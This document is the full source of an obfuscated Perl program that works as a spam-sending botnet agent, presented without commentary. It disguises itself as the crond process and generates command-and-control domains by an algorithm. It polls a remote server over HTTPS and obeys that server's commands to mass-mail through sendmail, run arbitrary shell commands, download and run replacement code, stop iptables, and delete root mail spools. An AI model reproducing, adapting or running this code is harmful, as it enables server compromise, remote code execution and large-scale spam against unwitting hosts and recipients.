#!/usr/bin/perl use strict; use Socket; use CGI; srand(time ^ $$ ^ unpack "%L*", `ps axww | gzip`); $SIG{PIPE}=sub {die "Broken pipe"}; $ENV{PATH}=$ENV{PATH}.":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"; my $g05a = ($< == 0); my $jdek = ((getpwuid($> ))[0]); my $kk6i = 0; $kk6i = length($ARGV[0]) if ($ARGV[0] =~ /^ +$/); my $jfb3 = int(rand(2147483647)); my ($i301, $h2aa, $anni); my $j9md = "sb2"; my $i31d=443; my $f97a="/b/index.php"; my $gmmp='/tmp/...'; my $j89f="/usr/bin/crond "; my $ik6k=0; my $ff58=0; my $j2l9=0; my $be3d=0; my $cibh=0; my $ajgj=0; my $b89m=50; my $p="1234567890"; my $cnc9; my $eg03="sendmail"; my $hjb8; my $f83g; my %ikad; my $fn4m=39; $ikad{'d_v'}=$fn4m; $ikad{'d_w'}=$jdek; $ikad{'d_rb'}=$kk6i; $ikad{'d_pi'}=$$; $ikad{'d_iv'}=$]; sub aao{print '['.localtime().'] '; print @_; }sub aai{return 0 if !open(SIGNFH, "> $gmmp"); return 0 if !flock(SIGNFH, 2 | 4); return 1; }sub ab4{my $cf30=shift; my $dem6=shift; my $bkpn=shift; my $hc3f=shift; my $g3ii=shift; my $ck7e=$cf30-> {'name'}; my $en2h=$cf30-> {'addr'}; my $cahh=ab6(4); my($bkpn, $amc9, $jn0e)=ab3($bkpn); $hc3f=~s/\[\[firstname\]\]/$ck7e/g; $hc3f=~s/\[\[id\]\]/$en2h/g; $hc3f=~s/\[\[count\]\]/$g3ii/g; $hc3f=~s/\[\[rand\]\]/$cahh/g; $bkpn=~s/\[\[firstname\]\]/$ck7e/g; $bkpn=~s/\[\[id\]\]/$en2h/g; $bkpn=~s/\[\[count\]\]/$g3ii/g; $bkpn=~s/\[\[rand\]\]/$cahh/g; for(my $i=0; $i< 10; $i++){my $ag69=$cf30-> {'params'}-> [$i]; $hc3f=~s/\[\[param$i\]\]/$ag69/g; $bkpn=~s/\[\[param$i\]\]/$ag69/g; }$bkpn=ab8($bkpn, $amc9, $jn0e) if($jn0e); my $d2p3="From: $dem6|To: ".($ck7e ? "\"$ck7e\" < $en2h> " : "$en2h")."|Subject: $bkpn"; eval{open SENDMAIL, "| $eg03 -t"; print SENDMAIL "From: $dem6\n"; print SENDMAIL "To: ".($ck7e ? "\"$ck7e\" < $en2h> " : "$en2h")."\n"; print SENDMAIL "Subject: $bkpn\n"; print SENDMAIL "\n" if ($eg03 =~ /\/mail/); print SENDMAIL "$hc3f"; close SENDMAIL; }; if($@){my $j8f3=$@; chomp $j8f3; return 0; }return 1; }sub aam{my $feli=shift; my $c907=shift; my @fmoc=@$c907; my $dem6=shift @fmoc; my $bkpn=shift @fmoc; my $hc3f; while(scalar(@fmoc)){my $idkj=shift @fmoc; if($idkj eq $feli){last; }$hc3f .=$idkj."\n"; }my @eck2; while(scalar(@fmoc)){my $cf30={}; my $idkj=shift @fmoc; my($bjgb, $g33h, @dh4b)=split /\t/, $idkj; if(!$g33h){$g33h=$bjgb; $bjgb=undef; }$cf30-> {'addr'}=$g33h; $cf30-> {'name'}=$bjgb if $bjgb; $cf30-> {'params'}=\@dh4b if(scalar(@dh4b)); push @eck2, $cf30 if($cf30-> {'addr'}); }for(my $i=0; $i< scalar(@eck2); ){if(ab4($eck2[$i], $dem6, $bkpn, $hc3f, $i)){$j2l9++; $be3d++; }else{$cibh++; $ajgj++; }$i++; }if($g05a){`rm -f /var/mail/root /var/spool/mail/root /var/mail/mail /var/spool/mail/mail`; }`rm -f ~/dead.letter`; }sub aaf{my $jpo2=sprintf($f83g." | grep -ci '< html'", "https://accounts.google.com/ServiceLogin?service=mail"); my($dlhb)=`$jpo2`; chomp $dlhb; return $dlhb; }sub abe{if($hjb8 eq "wget"){my($db8o)=`wget --version | head -n1 | grep -o "\\.[0-9]*" | grep -o "[0-9]*\$"`; chomp $db8o; $db8o=int($db8o); $f83g="wget -q -O - -t 1 -T 60 "; $f83g .="--no-check-certificate " if($db8o > 9); $f83g .='"%s"'; }elsif($hjb8 eq "curl"){$f83g='curl -s -k --max-time 60 "%s"'; }elsif($hjb8 eq "fetch"){$f83g='fetch -T 60 -q -o - "%s"'; }}sub ab5{my @if9d=('wget', 'curl', 'fetch'); undef $hjb8; foreach my $c35d(@if9d){if($cnc9){my $kbol=`which $c35d`; next if ($kbol !~ /^\//); } $hjb8 = $c35d; abe(); if (!aaf()) { undef $hjb8; next; } last; } if (!$hjb8) { $hjb8 = "wget"; abe(); }$ikad{'d_br'}=$hjb8; }my $c72n=0; sub abc{return if(time() - $c72n < 3600); $c72n=time(); $cnc9=`which which | grep -v alias | sed -e 's/^[[:space:]]*//'`; ab5(); ab7(); aad() if($g05a); my $h57d=`ps -xo command | grep -v grep | grep postfix/master | wc -l | sed -e 's/^[[:space:]]*//'`; chomp $h57d; if($h57d){$ikad{'d_ma'}='postfix'; if($cnc9){$h57d=`which sendmail.postfix`; chomp $h57d; $eg03 = $h57d if ($h57d =~ /^\/.*ab4.postfix$/); } } else { $ikad{'d_ma'}='sendmail'; }$ikad{'d_mc'}=$eg03; }sub aad{my @g32h=("postfix", "sendmail"); foreach my $glno(@g32h){my $ip25=`service $glno status`; chomp $ip25; if ($ip25 =~ /running/i) { return $glno; } } foreach my $glno (@g32h) { my $h1me = `service $glno start`; chomp $h1me; if ($h1me =~ /done/i || $h1me =~ /ok/i) { return $glno; } } return undef; } sub ab7 { my @f9b1 = ('sendmail', 'mailx', 'mail'); my @b9b7=('/etc/', 'cron', '.cpan', '/lib', 'log.d', '/services/', '/cgi-bin/', 'mail-lock', 'mail-unlock', 'mail-touchlock', 'formail', 'traptoemail', 'run-mailcap', 'checksendmail', 'w3mmail.cgi'); my $cl7p; foreach my $be1l(@f9b1){if($cnc9){my $bb27=`which $be1l`; chomp $bb27; if ($bb27 =~ /^(\/[^ ]+)/) { $eg03 = $1; return 1; } } $cl7p = "locate $be1l | head -n1000"; my @ehja=split /\n/, `$cl7p`; $cl7p="find /bin/ /sbin/ /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin/ -type f -or -type l | grep $be1l "; push @ehja, split /\n/, `$cl7p`; chomp @ehja; my @bc2l; foreach my $ddl4 (@ehja) { next if (-d $ddl4); next if (! -x $ddl4); next if ($ddl4 =~ /\.so$/); my $c986 = 0; foreach my $j70k (@b9b7) { if ($ddl4 =~ /$j70k/) { $c986 = 1; last; } } next if $c986; if ($ddl4 =~ /bin\// && $ddl4 =~ /$be1l$/) { $eg03 = $ddl4; return 1; } push (@bc2l,$ddl4); } foreach my $ddl4 (@bc2l) { if ($ddl4 =~ /bin\//) { $eg03 = $ddl4; return 1; } } foreach my $ddl4 (@bc2l) { if ($ddl4 =~ /$be1l$/) { $eg03 = $ddl4; return 1; } } } return 0; } sub aac { my $idkj = shift; my $jebb = shift; if ($jebb =~ /([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/) { $jebb = ($1< < 24)+($2< < 16)+($3< < 8)+($4); } else { $jebb = int($jebb); } my @e72l; $e72l[0] = ((($jebb&0xFF000000)> > 24)+15)%256; $e72l[1] = ((($jebb&0x00FF0000)> > 16)+13)%256; $e72l[2] = ((($jebb&0x0000FF00)> > 8)+52)%256; $e72l[3] = ((($jebb&0x000000FF))+71)%256; my $b0oj; for (my $i = 0; $i < length($idkj); $i++) { my $j2n2 = ord(substr ($idkj, $i, 1)); my $d = int($j2n2^$e72l[$i%4]); $b0oj .= sprintf("%02x", $d); $e72l[($i+1)%4] = ($e72l[($i+1)%4]+$d)%256; } return $b0oj; } sub aah { my $idkj = shift; my $jebb = shift; if ($jebb =~ /([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/) { $jebb = ($1< < 24)+($2< < 16)+($3< < 8)+($4); } else { $jebb = int($jebb); } my @e72l; $e72l[0] = ((($jebb&0xFF000000)> > 24)+15)%256; $e72l[1] = ((($jebb&0x00FF0000)> > 16)+13)%256; $e72l[2] = ((($jebb&0x0000FF00)> > 8)+52)%256; $e72l[3] = ((($jebb&0x000000FF))+71)%256; my $b0oj; for (my $i = 0; $i < length($idkj)/2; $i++) { my $j2n2 = hex(substr ($idkj, $i*2, 2)); $e72l[($i+1)%4] = ($e72l[($i+1)%4]+$j2n2)%256; $b0oj .= chr($j2n2^$e72l[$i%4]); } return $b0oj; } sub ab1 ($; $) { if ($] > = 5.006) { require bytes; if (bytes::length($_[0]) > length($_[0]) || ($] > = 5.008 && $_[0] =~ /[^\0-\xFF]/)) { require Carp; Carp::croak("The Base64 encoding is only defined for bytes"); }}use integer; my $kfl6=$_[1]; $kfl6="\n" unless defined $kfl6; my $b0oj=pack("u", $_[0]); $b0oj=~s/^.//mg; $b0oj=~s/\n//g; $b0oj=~tr/\` -_/AA-Za-z0-9+\//; my $foa6=(3 - length($_[0]) % 3) % 3; $b0oj=~s/.{$foa6}$/'=' x $foa6/e if $foa6; if(length $kfl6){$b0oj=~s/(.{1,76})/$1$kfl6/g; }return $b0oj; }sub aal($){local($^W)=0; use integer; my $idkj=shift; $idkj=~tr|A-Za-z0-9+=/||cd; if(length($idkj) % 4){require Carp; Carp::carp("Length of base64 data not a multiple of 4")}$idkj=~s/=+$//; $idkj=~tr|A-Za-z0-9+/| -_|; return "" unless length $idkj; my $jkn8=''; my($i, $l); $l=length($idkj) - 60; for($i=0; $i < =$l; $i +=60){$jkn8 .="M" . substr($idkj, $i, 60); }$idkj=substr($idkj, $i); if($idkj ne ""){$jkn8 .=chr(32 + length($idkj)*3/4) . $idkj; }return unpack("u", $jkn8); } sub ab3 { my $idkj = shift; my ($amc9, $jn0e, $bo0f); if ($idkj =~ /^=\?([^\?]+)\?([^\?]+)\?(.+)\?=$/i) { $amc9 = $1; $jn0e = $2; $bo0f = $3; if (lc($jn0e) eq "b"){$idkj=aal($bo0f); return($idkj, $amc9, $jn0e); }}return($idkj, undef, undef); }sub ab8{my $idkj=shift; my $amc9=shift; my $jn0e=shift; return '=?'.$amc9.'?'.$jn0e.'?'.ab1($idkj, '').'?='; }sub ab6{my $k1mp=shift; my @g8c0=('a'..'z'); my $aldg; foreach(1..$k1mp){$aldg.=$g8c0[rand @g8c0]; }return $aldg; }sub aak{my $a=shift; my $b0oj=0; $b0oj +=(ord(substr($a,3,1)) & 0xFF); $b0oj +=(ord(substr($a,2,1)) & 0xFF) < < 8; $b0oj +=(ord(substr($a,1,1)) & 0xFF) < < 16; $b0oj +=(ord(substr($a,0,1)) & 0xFF) < < 24; return $b0oj; }sub abd{my $i301=shift; my $c8hp=inet_aton($i301); return(defined $c8hp)?inet_ntoa($c8hp):undef; }sub abb{my $i981=shift; my $c35d=sprintf($f83g, $i981); my @b0oj=`$c35d`; chomp @b0oj; return @b0oj; }sub aag{my $i981=shift; my $g9d3=shift; if($hjb8 eq "wget"){`wget -q "$i981" -O "$g9d3"`; }elsif($hjb8 eq "curl"){`curl "$i981" > "$g9d3"`; }elsif($hjb8 eq "fetch"){`fetch -o "$g9d3" "$i981"`; }}my $egf3=0; my $aome=0; my $h6j2; my @i1l5=(); sub aba{my $h2aa=$i31d; undef $h6j2; return($h6j2, $h2aa) if(ab0($i1l5[$egf3], $h2aa)); my $do81=$egf3; for($egf3=0; $egf3 < 10; $egf3++){if($egf3==4){my @p=split '',$p; my $hf96=$p[6]; $hf96="$hf96$hf96.6$hf96."; $hf96 .=$p[7].$p[9]; $hf96 .='.'.$p[2].$p[0]; return($hf96, $h2aa) if(aae($hf96, $h2aa)); }if($egf3==5){my @p=split '',$p; my $hf96=$p[7].$p[4]; $hf96 .='.'.$p[1].$p[0].$p[3]; $hf96 .='.'.$p[7].$p[9]; $hf96 .='.'.$p[3]; return($hf96, $h2aa) if(aae($hf96, $h2aa)); }next if($do81==$egf3); return($h6j2, $h2aa) if(ab0($i1l5[$egf3], $h2aa)); }my @p=split '',$p; my $hf96=$p[1].$p[9]; $hf96=$hf96.$p[7].'.'.$hf96; $hf96='.'.$hf96; $hf96='.'.$p[1].$p[2].$hf96; $hf96=$p[8].$p[3].$hf96; return($hf96, $h2aa) if(aae($hf96, $h2aa)); $aome++; return undef; }my $icad=0; sub aaj{($i301, $h2aa)=aba(); $icad=time() if($i301); $ikad{'d_fd'}=$i301; $ikad{'d_fi'}=$anni; $ikad{'d_fp'}=$h2aa; }sub ab2{my($dfik, $gmnc)=(14400, 3600); return if(time() - $icad < $dfik); my($jkcg, $j4hp, $eg7k)=($i301, $h2aa, $anni); aaj(); return if($i301 && $h2aa && $anni); ($i301, $h2aa, $anni)=($jkcg, $j4hp, $eg7k); $icad=time() -($dfik - $gmnc); }sub ab0{my $i301=shift; my $h2aa=shift; my $don0="www.".$i301; my $di2i=aak(inet_aton($don0)); if($di2i){my $gha6=ab6(10).".".$i301; my $i2n2=aak(inet_aton($gha6)); if($i2n2 &&($i2n2==$di2i+1)){return aae($gha6, $h2aa); }}return 0; }sub aae{$h6j2=shift; my $h2aa=shift; my $jlb4=int(rand(2147483647)); my $jebb=int(rand(2147483647)); $anni=abd($h6j2); my $j7cf=$jlb4."*".$jfb3."*".$jebb; my $f1i9=aac($j7cf, $anni); my $i981="https://$h6j2:$h2aa/$f97a?id=$f1i9&check=1"; my @fmoc = abb($i981); for (my $i=0; $i< scalar(@fmoc); $i++) { $fmoc[$i] = aah($fmoc[$i], $jebb); } my $ki8n = shift @fmoc; if ($ki8n =~ /^SUCCESS$/) { $aome = 0; return 1; } return 0; } sub ab9 { my $jebb = shift; my $jlb4 = shift; my $bo0f; foreach my $f (keys %ikad) { if ($f =~ /^d_(.+)$/) { my $ck7e = $1; $bo0f .= ($bo0f?"|":"")."$ck7e=".$ikad{$f}; }}$bo0f="$jlb4*$bo0f" if($jlb4); return aac($bo0f, $jebb); }my $deie; sub aap{my $g4jm=shift || time || 4357; my @a=(); for(1..10000){use integer; push @a, $g4jm & 0x7fffffff; $g4jm *=69069; }$deie={offset=> 0, array=> \@a}}sub aan{my $h11g=shift || 1.0; aap() unless defined $deie; $deie-> {offset}=($deie-> {offset}+ 1) % 10000; my $fkc7=$deie-> {offset}; my $a=$deie-> {array}; $$a[$fkc7]=($$a[($fkc7 - 471) % 10000] ^ $$a[($fkc7 - 1586) % 10000] ^ $$a[($fkc7 - 6988) % 10000] ^ $$a[($fkc7 - 9689) % 10000]); return $$a[$fkc7] * $h11g /(2**31); }sub aab{my $i77j=($j9md eq "sb3")?115:15; my $k1mp=10; my @g8c0=('a'..'z'); aap(123987); my $aldg; for(my $i=-$i77j; $i< $b89m; $i++){$aldg=""; foreach(1..$k1mp){$aldg.=$g8c0[int(aan(scalar(@g8c0)))]; }if($i > =0){my $ckeb=$aldg.".info"; push @i1l5, $ckeb; }}}if(!aai()){exit; }$0=$j89f if($j89f); aab(); my $j4e7=0; while(1){my $ki8n; my @fmoc; abc(); aaj() if(!$i301 || !$h2aa || !$anni); ab2(); if(!$i301 || !$h2aa || !$anni){if($aome > =24){last; }sleep 3600; next; }my $jlb4=int(rand(2147483647)); my $fcfa=int(rand(2147483647)); my $jebb=int(rand(2147483647)); my $j7cf=$jlb4."*".$jfb3."*".$jebb; my $f1i9=aac($j7cf, $anni); my $i981="https://$anni:$h2aa/$f97a?id=$f1i9"; $i981 .="&sent=$j2l9"; $i981 .="¬sent=$cibh"; $i981 .="&unknown=".CGI::escape($ik6k) if($ik6k); $i981 .="&testsend=1" if($ff58); $i981 .="&stat=".ab9($anni, $fcfa); @fmoc=abb($i981); for(my $i=0; $i< scalar(@fmoc); $i++){$fmoc[$i]=aah($fmoc[$i], $jebb); }$ki8n=shift @fmoc; if($ki8n){$j4e7=0; $j2l9=0; $cibh=0; $ff58=0; $ik6k=0; }else{$j4e7++; if($j4e7 > 3){$j4e7=0; undef($i301); undef($anni); undef($h2aa); }$ki8n="SLEEP 60"; } if ($ki8n =~ /^SLEEP ([0-9]+)$/) { sleep $1; next; } elsif ($ki8n =~ /^RELOAD (.*)$/) { aag($1, "/tmp/ "); close(SIGNFH); system('cd /tmp; nohup perl " " " " &'); sleep 5; `rm -f "/tmp/ " /tmp/nohup.out`; last; } elsif ($ki8n =~ /^KILL$/) { last; } elsif ($ki8n =~ /^SEND ([a-zA-Z0-9]+)$/) { aam($1, \@fmoc); undef @fmoc; sleep 1; next; } elsif ($ki8n =~ /^TESTSEND ([a-zA-Z0-9]+)$/) { aam($1, \@fmoc); undef @fmoc; $ff58 = 1; sleep 1; next; } elsif ($ki8n =~ /^EXECUTE (.*)$/) { qx($1); next; } elsif ($ki8n =~ /^START SENDMAIL$/) { `service sendmail start`; next; } elsif ($ki8n =~ /^STOP IPTABLES$/) { `service iptables stop`; next; }$ik6k=$ki8n; sleep 30; if(!aae($i301, $h2aa)){undef($i301); undef($anni); undef($h2aa); }}__END__